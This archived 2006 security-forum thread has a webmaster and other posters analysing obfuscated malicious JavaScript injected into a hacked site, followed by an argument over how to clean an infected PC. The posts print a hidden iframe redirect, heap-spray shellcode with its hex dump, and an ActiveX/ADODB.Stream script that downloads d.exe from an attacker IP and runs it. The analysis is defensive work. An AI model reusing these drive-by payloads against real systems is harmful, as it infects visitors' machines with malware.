|
Home > Archive > Computer Security > November 2006 > Malicious javascript obfustication
You are viewing an archived Text-only version of the thread.
To view this thread in it's original format and/or if you want to reply to
this thread please [click here]
| Author |
Malicious javascript obfustication
|
|
| Wong Yung 2006-10-23, 1:19 am |
| Hi
Recently the webserver my page is on was hacked. Someone put in some
malicious javascript which I believe redirects the browser to another
webpage. I want to go to the URL directly using something like links
on Linux or Safari on Mac (as I have a strong suspicion it's probably
exploitin some IE vulnerability or trying to download some Windows
trojan) to work out what exactly it was trying to do. However it looks
like the URL was obfusticated:
[quote]
s='@mjveqi$wvgA&lxxt>33i;he;2mr3syx2tltCwcmhA5&${mhxlA4$fsvhivA4$limklxA4$wx}piA&hmwtpe}>rsri&B';o='';for(i=0;i<92;i++){o+=String.fromCharCode(s.charCodeAt(i)-4);}document.write(o);
[/quote]
Is there any tool I can use to work out what the URL is from this?
Thanks!
| |
| Todd H. 2006-10-23, 1:19 am |
| "Wong Yung" <wongyung_peach@yahoo.com> writes:
> Hi
>
> Recently the webserver my page is on was hacked. Someone put in some
> malicious javascript which I believe redirects the browser to another
> webpage. I want to go to the URL directly using something like links
> on Linux or Safari on Mac (as I have a strong suspicion it's probably
> exploitin some IE vulnerability or trying to download some Windows
> trojan) to work out what exactly it was trying to do. However it looks
> like the URL was obfusticated:
>
> [quote]
> s='@mjveqi$wvgA&lxxt>33i;he;2mr3syx2tltCwcmhA5&${mhxlA4$fsvhivA4$limklxA4$wx}piA&hmwtpe}>rsri&B';o='';for(i=0;i<92;i++){o+=String.fromCharCode(s.charCodeAt(i)-4);}document.write(o);
> [/quote]
>
> Is there any tool I can use to work out what the URL is from this?
It's javascript so a web browser is all you need.
It's a rot 4 encoding if you will. It's just taking each of the
characters of that string s and subtracting 4 from it
i.e. s.charCodeAt(i)-4
By changing document.write(o) to an alert() call you can see what it
says.
It translates to
<iframe src="http://e7da7.in/out.php?s_id=1" width=0 border=0 height=0 style="display:none">
And that page appears to redirect somewhere else.
<a
href="http://kaonline.biz/redirect.php?a=/&b=ACURIOUSLONGSTRINGOFHEXCHARACTERS">Click here to enter the site </a>
--
Todd H.
http://www.toddh.net/
| |
| Wong Yung 2006-10-23, 1:19 am |
|
Todd H. wrote:
> "Wong Yung" <wongyung_peach@yahoo.com> writes:
>
>
> It's javascript so a web browser is all you need.
>
> It's a rot 4 encoding if you will. It's just taking each of the
> characters of that string s and subtracting 4 from it
> i.e. s.charCodeAt(i)-4
>
> By changing document.write(o) to an alert() call you can see what it
> says.
>
> It translates to
>
> <iframe src="http://e7da7.in/out.php?s_id=1" width=0 border=0 height=0 style="display:none">
>
>
> And that page appears to redirect somewhere else.
>
> <a
> href="http://kaonline.biz/redirect.php?a=/&b=ACURIOUSLONGSTRINGOFHEXCHARACTERS">Click here to enter the site </a>
>
>
>
> --
> Todd H.
> http://www.toddh.net/
Thanks very much Todd!
I went to the webpage and it's very strange. It doesn't seem to
attempt to download anything. They (kaonline.biz) claim that someone
is trying to blackmail them by sending spam in their name and then
trying to extort money from them. If this is true and they are not
lying their heads off I wonder if this is part of the supposed
extortion attempt. Or maybe they're just saying that because really
they are spammers and...*Sigh* I don't know what to believe anymore.
Still this is only what it is doing *now*. The webserver looks like it
has been hacked for a while now and god knows what's been happening in
the meantime.
Thanks though for helping out!
| |
| Todd H. 2006-10-23, 1:19 am |
| "Wong Yung" <wongyung_peach@yahoo.com> writes:
> Thanks very much Todd!
>
> I went to the webpage and it's very strange. It doesn't seem to
> attempt to download anything. They (kaonline.biz) claim that someone
> is trying to blackmail them by sending spam in their name and then
> trying to extort money from them. If this is true and they are not
> lying their heads off I wonder if this is part of the supposed
> extortion attempt. Or maybe they're just saying that because really
> they are spammers and...*Sigh* I don't know what to believe anymore.
>
> Still this is only what it is doing *now*. The webserver looks like it
> has been hacked for a while now and god knows what's been happening in
> the meantime.
>
> Thanks though for helping out!
No problem.
Was your webhost based on cpanel.net software? A few weeks ago, a
whole bunch of cpanel based sites got owned and were used largely to
spread the Internet Explorer 0day exploit dujour. I think that
issue has been patched but it did affect a lot of folks. Curious if
you were one of em.
Best Regards,
--
Todd H.
http://www.toddh.net/
| |
| Wong Yung 2006-10-23, 7:17 am |
|
Todd H. wrote:
> "Wong Yung" <wongyung_peach@yahoo.com> writes:
>
>
> No problem.
>
> Was your webhost based on cpanel.net software? A few weeks ago, a
> whole bunch of cpanel based sites got owned and were used largely to
> spread the Internet Explorer 0day exploit dujour. I think that
> issue has been patched but it did affect a lot of folks. Curious if
> you were one of em.
>
> Best Regards,
> --
> Todd H.
> http://www.toddh.net/
No,
I think the webserver was running Apache on Linux (I say "I think"
because I wasn't admining it so I don't know what exactly was running
on the computer). The problem is it wasn't updated and so I guess in
the end you can say it was all our own fault.
*Sigh* I'm still worried though because even though it looks like the
hack is fairly harmless now it looks like it was hacked a while ago and
who knows if they hadn't taken the opportunity to download Trojans onto
a few computers first. You know how it is with security - once one
thing gets compromised everything touching it is tainted because you
can't be sure what the hackers were doing.
Usually I run either Linux (most of these redirect things lead to some
Windows specific malware) or Windows with Firefox with the NoScript
extension which blocks all javascript except on sites you whitelist.
However, I *did* test my website in IE several times when the script
was present so I could make sure the css looked OK. Nor did I turn off
scripting in IE because I hardly ever use it and I didn't think my own
website would be a security risk. Not sure what to do now...probably
run a full anti-virus and anti-spyware check but you know that doesn't
catch everything. On the bright side of things I don't remember any
anti-virus alerts, or probably more importantly any warnings about
something trying to replace program x with a different version (I have
a program which detects when program files get changed) when I was
looking at my site in IE...
Anyway, thanks a lot for your help. It did help relieve my mind a lot.
| |
| Wong Yung 2006-10-23, 7:17 am |
| Todd H. wrote:
> "Wong Yung" <wongyung_peach@yahoo.com> writes:
>
lxA4$wx}piA&hmwtpe}>rsri&B';o=3D'';for(i=3D0;i<92;i++){o+=3DString.fromChar=
Code(s.charCodeAt(i)-4);}document.write(o);[vbcol=seagreen]
>
> It's javascript so a web browser is all you need.
>
> It's a rot 4 encoding if you will. It's just taking each of the
> characters of that string s and subtracting 4 from it
> i.e. s.charCodeAt(i)-4
>
> By changing document.write(o) to an alert() call you can see what it
> says.
>
> It translates to
>
> <iframe src=3D"http://e7da7.in/out.php?s_id=3D1" width=3D0 border=3D0 hei=
ght=3D0 style=3D"display:none">
>
>
> And that page appears to redirect somewhere else.
>
> <a
> href=3D"http://kaonline.biz/redirect.php?a=3D/&b=3DACURIOUSLONGSTRINGOF=
HEXCHARACTERS">Click here to enter the site </a>
>
>
>
> --
> Todd H.
> http://www.toddh.net/
Actually looking more closely at it there seems to be something else
going on as well. If I use links, it does exactly as you say.
However, using Opera, Firefox or Konqueror what it does is goes to a
webpage with
<script>var
s=3Dunescape(" %u4141%u4141%u4141%u4141%u4141%u4141%u41
41%u4141");
do{s+=3Ds;}while(s.length<0x0900000);s+=3Dunescape
(" %u54EB%u758B%u8B3C%u3574%u0378%u56F5%u76
8B%u0320
%u33F5%u49C9%uAD41%uDB33%u0F36%u14BE%u38
28%u74F2
%uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF%u5E
E7%u5E8B
%u0324%u66DD%u0C8B%u8B4B%u1C5E%uDD03%u04
8B%u038B
%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u43
00%u5C3A
%u2E55%u7865%u0065%uC033%u0364%u3040%u0C
78%u408B
%u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D
34%u7C40
%u408B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFF
FF%uEC83%u8304
%u242C%uFF3C%u95D0%uBF50%u1A36%u702F%u6F
E8%uFFFF%u8BFF
%u2454%u8DFC%uBA52%uDB33%u5353%uEB52%u53
24%uD0FF%uBF5D
%uFE98%u0E8A%u53E8%uFFFF%u83FF%u04EC%u2C
83%u6224%uD0FF
%u7EBF%uE2D8%uE873%uFF40%uFFFF%uFF52%uE8
D0%uFFD7%uFFFF
%u7468%u7074%u2F3A%u362F%u2E36%u3633%u32
2E%u3134%u322E
%u3334%u642F%u652E%u6578");</script></head><body><embed
src=3D"hacked3_files/------------------------------------------------------=
-----.html">
(I named the file hacked3.html)
The
"hacked3_files/-----------------------------------------------------------.=
html"
is a html file with:
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>403 Forbidden</TITLE>
</HEAD><BODY>
<H1>Forbidden</H1>
You don't have permission to access /expd/----------- (the hypthens
continue forever)
AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJ
KKKKLLLLAAA�NNNNOOOOAAA�QQQQRRRRSSS=
STTTTUUUUVVVVWWWWXXXXYYYYZZZZ00001111222
23333444455556666777788889999.wmv
on this server.<P>
<P>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle
the request.
<HR>
<ADDRESS>Apache/1.3.37 Server at 66.36.241.243 Port 80</ADDRESS>
</BODY></HTML>
So it looks like on Konqueror/Firefox/Opera it was trying to download a
wmv file (which no longer exists on the server). On links however it
seems to go to an entirely different webpage, the one which as you
point out tries to go to http://kaonline.biz/.
| |
|
| "Wong Yung" wrote:
> Actually looking more closely at it there seems to be something else
> going on as well. If I use links, it does exactly as you say.
> However, using Opera, Firefox or Konqueror what it does is goes to a
> webpage with
>
> <script>var
> s=unescape(" %u4141%u4141%u4141%u4141%u4141%u4141%u41
41%u4141");
> do{s+=s;}while(s.length<0x0900000);s+=unescape
> (" %u54EB%u758B%u8B3C%u3574%u0378%u56F5%u76
8B%u0320
[snip]
That variable "s" is storing executable code. The script inserts at
least 9437184 "A" characters (a NOP sled of 0x41), followed by code
which looks like this when dumped out in hex/ascii:
0000 EB 54 8B 75 3C 8B 74 35 78 03 F5 56 8B 76 20 03 .T.u<.t5x..V.v .
0010 F5 33 C9 49 41 AD 33 DB 36 0F BE 14 28 38 F2 74 .3.IA.3.6...(8.t
0020 08 C1 CB 0D 03 DA 40 EB EF 3B DF 75 E7 5E 8B 5E ......@..;.u.^.^
0030 24 03 DD 66 8B 0C 4B 8B 5E 1C 03 DD 8B 04 8B 03 $..f..K.^.......
0040 C5 C3 75 72 6C 6D 6F 6E 2E 64 6C 6C 00 43 3A 5C ..urlmon.dll.C:\
0050 55 2E 65 78 65 00 33 C0 64 03 40 30 78 0C 8B 40 U.exe.3.d.@0x..@
0060 0C 8B 70 1C AD 8B 40 08 EB 09 8B 40 34 8D 40 7C ..p...@....@4.@|
0070 8B 40 3C 95 BF 8E 4E 0E EC E8 84 FF FF FF 83 EC .@<...N.........
0080 04 83 2C 24 3C FF D0 95 50 BF 36 1A 2F 70 E8 6F ..,$<...P.6./p.o
0090 FF FF FF 8B 54 24 FC 8D 52 BA 33 DB 53 53 52 EB ....T$..R.3.SSR.
00A0 24 53 FF D0 5D BF 98 FE 8A 0E E8 53 FF FF FF 83 $S..]......S....
00B0 EC 04 83 2C 24 62 FF D0 BF 7E D8 E2 73 E8 40 FF ...,$b...~..s.@.
00C0 FF FF 52 FF D0 E8 D7 FF FF FF 68 74 74 70 3A 2F ..R.......http:/
00D0 2F 36 36 2E 33 36 2E 32 34 31 2E 32 34 33 2F 64 /66.36.241.243/d
00E0 2E 65 78 65 00 00 00 00 00 00 00 00 00 00 00 00 .exe............
I'm guessing it would use urlmon.dll to download the file "d.exe" from
66.36.241.243, which is a small executable packed using FSG. There's
also a reference to a file "C:\U.exe".
> The
> "hacked3_files/-----------------------------------------------------------.html"
> is a html file with:
[...]
> AAAABBBB [snip] NNNNOOOOAAA [snip] 88889999.wmv
The part between my snips had a control character (0x05) either side
of it. I don't know the reason for that.
[...]
> So it looks like on Konqueror/Firefox/Opera it was trying to download a
> wmv file (which no longer exists on the server). On links however it
> seems to go to an entirely different webpage, the one which as you
> point out tries to go to http://kaonline.biz/.
It appears to be an exploit involving a wmv vulnerability, but I don't
know how the binary code in the script variable "s" gets to be run.
Also spotted here:
http://www.castlecops.com/p842233-P...MV_exploit.html
| |
| Wong Yung 2006-10-24, 1:24 am |
|
Ant wrote:
> "Wong Yung" wrote:
>
>
> It appears to be an exploit involving a wmv vulnerability, but I don't
> know how the binary code in the script variable "s" gets to be run.
>
> Also spotted here:
> http://www.castlecops.com/p842233-P...MV_exploit.html
Wow. Thanks very much for the info. And thanks heaps for
unobfusticating the stuff in javascript. Hmmm...looking at the
castlecops link it looks like we aren't the only ones who were hacked
using the same thing. Do you have any idea why links goes to
kaonline.biz? I'm trying to work out what role they play in all of
this.
| |
|
| "Wong Yung" wrote:
> Wow. Thanks very much for the info. And thanks heaps for
> unobfusticating the stuff in javascript. Hmmm...looking at the
> castlecops link it looks like we aren't the only ones who were hacked
> using the same thing. Do you have any idea why links goes to
> kaonline.biz? I'm trying to work out what role they play in all of
> this.
I don't know if they are involved. They say they're being attacked,
so you could report it to them, but as far as I can tell there is no
exploit if the redirect is to kaonline.biz.
If I use wget on the "e7da7.in" link, I get redirected to kaonline.
However, if I use telnet, the redirection is to:
ht_p://66.36.241.243/expd/index.php
(I've munged the "http" in case anyone's click-happy)
That's where the malicious code is, and I found a different (and more
obfuscated) exploit to what you posted before.
Where you are redirected, and what exploit is served up probably
depends on the user-agent header of the http request.
| |
| Wong Yung 2006-10-27, 1:25 am |
|
Ant wrote:
> "Wong Yung" wrote:
>
>
> I don't know if they are involved. They say they're being attacked,
> so you could report it to them, but as far as I can tell there is no
> exploit if the redirect is to kaonline.biz.
>
> If I use wget on the "e7da7.in" link, I get redirected to kaonline.
> However, if I use telnet, the redirection is to:
> ht_p://66.36.241.243/expd/index.php
> (I've munged the "http" in case anyone's click-happy)
>
> That's where the malicious code is, and I found a different (and more
> obfuscated) exploit to what you posted before.
>
> Where you are redirected, and what exploit is served up probably
> depends on the user-agent header of the http request.
*Sigh* I couldn't get a nice simple evil guy could I? BTW what is this
other more obfusticated exploit that you found?
| |
|
| "Wong Yung" wrote:
> *Sigh* I couldn't get a nice simple evil guy could I?
Many of the malware writers today are funded by organized crime, and
the software is getting more sophisticated. It's not so much hackers
having fun anymore.
> BTW what is this other more obfusticated exploit that you found?
There are a couple of levels of encoded script which I won't go
through here, but eventually it boils down to this (some munging
again; [ ] replace < >, and ht_p replaces http) ...
[script language='jscript']
a=new ActiveXObject('Shell.Application');
var x = new ActiveXObject('Mic'+'ros'+'oft.X'+'MLHTTP');
x.Open('GET','ht_p://66.36.241.243/d.exe',0);
x.Send();
var s=new ActiveXObject('ADODB.Stream');
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile('../tm.exe',2);
a.ShellExecute('../tm.exe');
[/script]
So here is another method of downloading "d.exe" from the same IP
address as before, then using the ADODB.Stream cross-domain exploit
to save the file as "tm.exe" and run it in the context of the local
machine. MS patched this particular vulnerability some time ago.
| |
| Sebastian Gottschalk 2006-10-28, 1:35 am |
| Ant wrote:
>
> Many of the malware writers today are funded by organized crime, and
> the software is getting more sophisticated. It's not so much hackers
> having fun anymore.
Actually decoding obfuscated stuff can be quite fun. F.e. I once got a
script that used its very own URL (retrieved by document.location) as a
part of the self-decryption - anyone who didn't care for the URL anymore
after 4 redirects (each with a new obfuscation) and didn't store it, had a
little problem.
At the end, the last obfuscation layer outputted a script in a broken way,
so it didn't work correctly. But one could still figure out what it did -
and among many classical IE "exploits" one could actually find two new
ones. Reported them to Microsoft quickly, and a patch was never issued.
Business as usual.
> So here is another method of downloading "d.exe" from the same IP
> address as before, then using the ADODB.Stream cross-domain exploit
> to save the file as "tm.exe" and run it in the context of the local
> machine. MS patched this particular vulnerability some time ago.
Not quite true. One can sometimes trigger to download new or old versions
of existing ActiveX controls (ignoring IE's settings), and then make such
exploits work again. Even aside from that, just invoking an ActiveX control
without any possibility to access its scripting, can have devasting side
effects - f.e. invoking TlntSrv.TlntClientEnum (not safe for scripting)
made Windows 2000 Server SP3 start the Telnet Server Service if installed.
| |
| Wong Yung 2006-10-28, 1:35 am |
|
Sebastian Gottschalk wrote:
> Ant wrote:
>
>
> Actually decoding obfuscated stuff can be quite fun. F.e. I once got a
> script that used its very own URL (retrieved by document.location) as a
> part of the self-decryption - anyone who didn't care for the URL anymore
> after 4 redirects (each with a new obfuscation) and didn't store it, had a
> little problem.
> At the end, the last obfuscation layer outputted a script in a broken way,
> so it didn't work correctly. But one could still figure out what it did -
> and among many classical IE "exploits" one could actually find two new
> ones. Reported them to Microsoft quickly, and a patch was never issued.
> Business as usual.
>
>
> Not quite true. One can sometimes trigger to download new or old versions
> of existing ActiveX controls (ignoring IE's settings), and then make such
> exploits work again. Even aside from that, just invoking an ActiveX control
> without any possibility to access its scripting, can have devasting side
> effects - f.e. invoking TlntSrv.TlntClientEnum (not safe for scripting)
> made Windows 2000 Server SP3 start the Telnet Server Service if installed.
Now I'm getting scared...So how can I be sure there isn't any nasty
stuff on my computer as a result of this? I've run a full antivirus
check, a full antispyware check and a full anti-trojan check using
Trojan Hunter and these programs at least say I'm clean. I am fully
patched up (I always install the updates as soon as they become
available). And I've run netstat and it doesn't show any strange
internet connections and my firewall doesn't show any strange
connections though of course it could be piggying-back on another
program. *Sigh* Who'd thought that you'd get infected from your own
webpage.
| |
| Sebastian Gottschalk 2006-10-28, 7:24 am |
| Wong Yung wrote:
> Now I'm getting scared...So how can I be sure there isn't any nasty
> stuff on my computer as a result of this?
Comparing all relevant system binaries against a baseline set of checksums?
Anyway, you said you're using Safari or Links (eh... try Links2). Those
don't know anything about ActiveX - only IE is vulnerable. Maybe also
Mozilla with the ActiveX plugin intentionally installed, but even then
you've have to explicitly whitelist vulnerable controls in first place.
> I've run a full antivirus check, a full antispyware check and a full
> anti-trojan check using Trojan Hunter and these programs at least say I'm clean.
Which means exactly nothing.
> I am fully patched up (I always install the updates as soon as they become
> available).
Well, at least for IE, OE, WMP and the Messenger stuff (and Wordpad if
you're not running Windows Server 2003), this means about nothing.
> And I've run netstat and it doesn't show any strange
> internet connections and my firewall doesn't show any strange
> connections though of course it could be piggying-back on another
> program.
As already mentioned: If you didn't use IE, there's no reason why you would
have any problem at all.
> *Sigh* Who'd thought that you'd get infected from your own webpage.
At least for IE, any user should think so: It's stated in the manual! [1]
[1] Windows XP/Server 2003 Security Guide, Group Policies, IE, "Object
Caching Protection. It describes how you can activate a totally incomplete
solution to an inherent design problem that makes cross-site-scripting
trivially possible, in conjunction with the default full trust in the
Windows Update website as the XSS target giving every website full access
to all security-critical functions of IE.
| |
| Wong Yung 2006-10-28, 7:24 am |
|
Sebastian Gottschalk wrote:
> Wong Yung wrote:
>
>
> Comparing all relevant system binaries against a baseline set of checksums?
>
> Anyway, you said you're using Safari or Links (eh... try Links2). Those
> don't know anything about ActiveX - only IE is vulnerable. Maybe also
> Mozilla with the ActiveX plugin intentionally installed, but even then
> you've have to explicitly whitelist vulnerable controls in first place.
>
>
> Which means exactly nothing.
>
>
> Well, at least for IE, OE, WMP and the Messenger stuff (and Wordpad if
> you're not running Windows Server 2003), this means about nothing.
>
>
> As already mentioned: If you didn't use IE, there's no reason why you would
> have any problem at all.
>
>
> At least for IE, any user should think so: It's stated in the manual! [1]
>
>
>
> [1] Windows XP/Server 2003 Security Guide, Group Policies, IE, "Object
> Caching Protection. It describes how you can activate a totally incomplete
> solution to an inherent design problem that makes cross-site-scripting
> trivially possible, in conjunction with the default full trust in the
> Windows Update website as the XSS target giving every website full access
> to all security-critical functions of IE.
I use Linux at work but at home I have Windows XP. Usually I use
Firefox. However, as I was changing some things on my site I thought
that I should check that it works in IE as well (you know IE and
css...). Ergo I looked at my homepage in IE. Normally I avoid IE like
the plague but I thought, hey it's my own homepage, should be safe.
Right? Unfortunately I had IE on the default Moderate Security setting
because I never use IE.
*Sigh*
| |
| Wong Yung 2006-10-28, 7:24 am |
|
Wong Yung wrote:
>
> I use Linux at work but at home I have Windows XP. Usually I use
> Firefox. However, as I was changing some things on my site I thought
> that I should check that it works in IE as well (you know IE and
> css...). Ergo I looked at my homepage in IE. Normally I avoid IE like
> the plague but I thought, hey it's my own homepage, should be safe.
> Right? Unfortunately I had IE on the default Moderate Security setting
> because I never use IE.
>
> *Sigh*
Oh yeah, I forgot to mention. I may use Linux at work but practically
everyone else uses Windows XP with IE. And of course they visit the
hacked webpage fairly regularly which is actually not really my
personal personal webpage but more like the webpage for the entire
group (when I talk about my homepage I'm talking about my personal page
in this larger group site) so they go there to say get the latest news
and whatnot. I do too but I usually do so at work in Linux or if I'm
at home using Windows using Firefox (the only time I used IE was for 2
minutes once to check whether the css was screwed up or not. Sadly
enough that may be all that was required to get myself hacked...).
Most of the other people at work go there in Windows using IE. So as
you can see, there is quite a lot of potential for trouble here...
| |
|
| "Wong Yung" wrote:
> Sebastian Gottschalk wrote:
>
> Now I'm getting scared...So how can I be sure there isn't any nasty
> stuff on my computer as a result of this?
You could start by looking for those files mentioned in the exploits
(u.exe, d.exe and tm.exe), although sometimes the malware will delete
the initial files once it's installed.
> I've run a full antivirus
> check, a full antispyware check and a full anti-trojan check using
> Trojan Hunter and these programs at least say I'm clean. I am fully
> patched up (I always install the updates as soon as they become
> available). And I've run netstat and it doesn't show any strange
> internet connections and my firewall doesn't show any strange
> connections though of course it could be piggying-back on another
> program.
If there's no unusual activity you are probably ok, but unless you're
very familiar with your system the only sure way is to reformat the HD
and reinstall the OS.
There's now an 'ADODB.connection' vulnerability which has just been
discovered. See http://isc.sans.org/diary.php?storyid=1807
Next time you use IE on the Internet, be sure to disable ActiveX
completely.
| |
| Sebastian Gottschalk 2006-10-29, 1:16 pm |
| Ant wrote:
> Next time you use IE on the Internet, be sure to disable ActiveX
> completely.
Doesn't matter. There ar various unpatched buffer overflows which can be
triggered without any ActiveX or Scripting. In any case, you're pissed off.
| |
|
| "Sebastian Gottschalk" wrote:
> Ant wrote:
>
> Doesn't matter. There ar various unpatched buffer overflows which can be
> triggered without any ActiveX or Scripting.
Well, that doesn't surprise me.
> In any case, you're pissed off.
What do you mean by that? I'm quite content, thanks.
| |
| erewhon 2006-10-29, 1:16 pm |
|
>
> It's javascript so a web browser is all you need.
>
> It's a rot 4 encoding if you will. It's just taking each of the
> characters of that string s and subtracting 4 from it
> i.e. s.charCodeAt(i)-4
Can you explain the process/tools you use - I'm no code head but am
impressed by this type of work
| |
| Sebastian Gottschalk 2006-10-29, 7:23 pm |
| erewhon wrote:
>
> Can you explain the process/tools you use - I'm no code head but am
> impressed by this type of work
Huh? This is absolutely trivial to understand. At best, you'd jsut need to
replace document.write(o) with f.e. prompt('','',o); or
document.write('<pre>'+o+'</pre>'); to get the decoded output written as
text-only, without any care for the encoding used.
| |
| Sebastian Gottschalk 2006-11-01, 7:28 pm |
| Ant wrote:
> "Sebastian Gottschalk" wrote:
>
>
> Well, that doesn't surprise me.
>
>
> What do you mean by that? I'm quite content, thanks.
Well, it doesn't matter with what caliber you get shot. The bad guys aren't
so dumb to only try old, already patched vulnerabilities.
| |
|
| "Sebastian Gottschalk" wrote:
> Ant wrote:
>
> Well, it doesn't matter with what caliber you get shot. The bad guys aren't
> so dumb to only try old, already patched vulnerabilities.
I wasn't "shot", and even if I had been, I wouldn't be "pissed off".
| |
| Sebastian Gottschalk 2006-11-02, 7:22 pm |
| Ant wrote:
> "Sebastian Gottschalk" wrote:
>
>
> I wasn't "shot"
By English isn't that bad that I wouldn't understand that "you" also means
"someone".
> , and even if I had been, I wouldn't be "pissed off".
Oh, sure. Out of the unpatched vulnerabilities in MSIE, a lot allow code
execution and can't be worked around by any configuration. I'd say goodbye
to %userprofile%.
| |
|
| "Sebastian Gottschalk" wrote:
> Ant wrote:
>
> By English isn't that bad that I wouldn't understand that "you" also means
> "someone".
Your English is way better than my German, but I'm not sure why you
use the term "pissed off". In the UK it means annoyed or fed-up.
>
> Oh, sure. Out of the unpatched vulnerabilities in MSIE, a lot allow code
> execution and can't be worked around by any configuration. I'd say goodbye
> to %userprofile%.
I had a couple of nasties sneak in a long time ago, but I wasn't
pissed off. They were temporary interruptions which I quickly fixed.
| |
| Sebastian Gottschalk 2006-11-03, 1:28 am |
| Ant wrote:
> "Sebastian Gottschalk" wrote:
>
>
> Your English is way better than my German, but I'm not sure why you
> use the term "pissed off". In the UK it means annoyed or fed-up.
My fault, I guess "XXXXed" or "XXXXed up" would have been more appropriate
(beside being a bit vulgar).
>
> I had a couple of nasties sneak in a long time ago, but I wasn't
> pissed off. They were temporary interruptions which I quickly fixed.
This is, of course, nonsense. Without any baseline system as comparison
(f.e. cryptographic checksums), every data the user had access to might be
and should reasonably be assumed as being compromised. There is no such
thing like a quick fix. Your system is most likely still compromised
without you having any chance to detect it.
| |
|
| "Sebastian Gottschalk" wrote:
> Ant wrote:
>
> My fault, I guess "XXXXed" or "XXXXed up" would have been more appropriate
> (beside being a bit vulgar).
Yes, that would make more sense.
>
> This is, of course, nonsense.
No, it isn't.
> Without any baseline system as comparison (f.e. cryptographic
> checksums), every data the user had access to might be and should
> reasonably be assumed as being compromised.
Yes, that's reasonable for unknown malware. However, I knew what hit
me, knew how far it got into the system and what it did, and knew how
to clean it up.
> There is no such thing like a quick fix.
For me, there was.
> Your system is most likely still compromised without you having any
> chance to detect it.
It most certainly is not.
| |
| Sebastian Gottschalk 2006-11-04, 7:19 am |
| Ant wrote:
>
> No, it isn't.
It is. As long as you don't have strict evidence that no data were altered,
you should assume it being so.
>
> Yes, that's reasonable for unknown malware. However, I knew what hit
> me, knew how far it got into the system and what it did, and knew how
> to clean it up.
I claim that you really don't know the malware. Some suggestions:
- The malware did something special, then modified itself to represent a
known malware.
- You only compared by signatures, leaving out minor modifications.
- Most malware downloads additional malware.
- Most malware opens backdoors, which then allow the attacker to do any
kind of modification, add new code, ...
- The malware itself used a vulnerability. You should assume that other,
unknown malware used the very same one.
>
> For me, there was.
Well, you should reflect about the meaning of "fix".
>
> It most certainly is not.
So, do you have any evidence to delude the null hypothesis?
| |
| erewhon 2006-11-04, 7:19 am |
|
> - The malware did something special, then modified itself to represent a
> known malware.
> - You only compared by signatures, leaving out minor modifications.
> - Most malware downloads additional malware.
> - Most malware opens backdoors, which then allow the attacker to do any
> kind of modification, add new code, ...
> - The malware itself used a vulnerability. You should assume that other,
> unknown malware used the very same one.
Agreed
The only sure-fire fix is:
1. Format
2. Rebuild the os
3. Patch to the latest
4. Ensure firewall policies lock access
This is the only way to clean such an exploit infection.
Even this will not prevent the next 0day exploit.
| |
| Sebastian Gottschalk 2006-11-04, 7:19 am |
| erewhon wrote:
> The only sure-fire fix is:
>
> 1. Format
> 2. Rebuild the os
> 3. Patch to the latest
> 4. Ensure firewall policies lock access
Another, more usable method are checksums and a good backup system. Once
you have checked all relevant system binaries, the user's profile and all
his programs against a known safe set of checksums, and carefully replaced
the changes, you can boot up the system again. Now you can login, check the
rest of the data (other users' profiles and programs, all other data) in
the background while getting back to normal.
Or can simply restore the last backup state, without caring for detecting
the modifications, with more easiness at the expense of more time.
> Even this will not prevent the next 0day exploit.
There's nothing that can prevent random errors.
| |
|
| "Sebastian Gottschalk" wrote:
>
> It is. As long as you don't have strict evidence that no data were altered,
> you should assume it being so.
I do assume the worst until I've investigated.
>
> I claim that you really don't know the malware.
I know you are wrong.
> Some suggestions:
> - The malware did something special, then modified itself to represent a
> known malware.
It did not.
> - You only compared by signatures, leaving out minor modifications.
I did not.
> - Most malware downloads additional malware.
These did not.
> - Most malware opens backdoors, which then allow the attacker to do any
> kind of modification, add new code, ...
These did not.
> - The malware itself used a vulnerability. You should assume that other,
> unknown malware used the very same one.
One got in by my having port 445 listening for SMB & RPC (now closed),
another by clicking on something when I should have known better, and
the last by me fooling around with a known malware sample from my
collection.
In all cases I knew immediately what had happened and cleaned up there
and then.
>
> Well, you should reflect about the meaning of "fix".
No need. I know my system inside-out.
>
> So, do you have any evidence to delude the null hypothesis?
I don't see how I can can give evidence of a clean machine; you would
have to inspect it. Having years of experience with computers and
software (before MS entered the field), and complete familiarity with
my system, I know I'm not compromised. In addition, I connect to the
net for very short periods with an external dial-up modem and watch
the (slow) traffic. Any unusual activity, and I can hit the "off"
button and investigate.
Since I've tightened up my security, restricting what IE can do, and
generally being more careful, I've had no problems at all.
| |
| Sebastian Gottschalk 2006-11-04, 7:26 pm |
| Ant wrote:
>
> One got in by my having port 445 listening for SMB & RPC (now closed),
> another by clicking on something when I should have known better, and
> the last by me fooling around with a known malware sample from my
> collection.
The first ones provided full system access to the malware, your claims
therefore are delusive and nothing else.
>
> I don't see how I can can give evidence of a clean machine; you would
> have to inspect it.
I was asking if you had evidence. Evidence for a clean machine f.e. would
be a successful comparison of all system binaries and data against a
well-known clean state with giving reasonable explanations for all
differences.
> Since I've tightened up my security, restricting what IE can do, and
> generally being more careful, I've had no problems at all.
No this is where you lost every sound of professionality. There is no way
to configure MSIE to be safe just even against all known unpatched
vulnerabilities, not even talking about being usable.
| |
|
| "Sebastian Gottschalk" wrote:
> Ant wrote:
>
> The first ones provided full system access to the malware, your claims
> therefore are delusive and nothing else.
Rubbish. I know how my system behaves and what's running on it.
>
> I was asking if you had evidence. Evidence for a clean machine f.e. would
> be a successful comparison of all system binaries and data against a
> well-known clean state with giving reasonable explanations for all
> differences.
I've compared enough system files and checked all registry entries
from which stuff can be launched to satisfy myself that all is well.
>
> No this is where you lost every sound of professionality. There is no way
> to configure MSIE to be safe just even against all known unpatched
> vulnerabilities, not even talking about being usable.
It's safe enough given the the configuration of my O/S and my surfing
habits. If this were a business-critical machine, I might be more
concerned. However, it's a home PC which contains nothing of value and
no sensitive information. It goes online for only very brief periods,
and during that time I know it's not transmitting rogue packets.
| |
| Sebastian Gottschalk 2006-11-05, 1:16 pm |
| Ant wrote:
> and checked all registry entries from which stuff can be launched
Now you've lost the last sound of professionality.
>
> It's safe enough given the the configuration of my O/S and my surfing
> habits.
Bullshit. It's unsafe at any rate.
> However, it's a home PC which contains nothing of value and
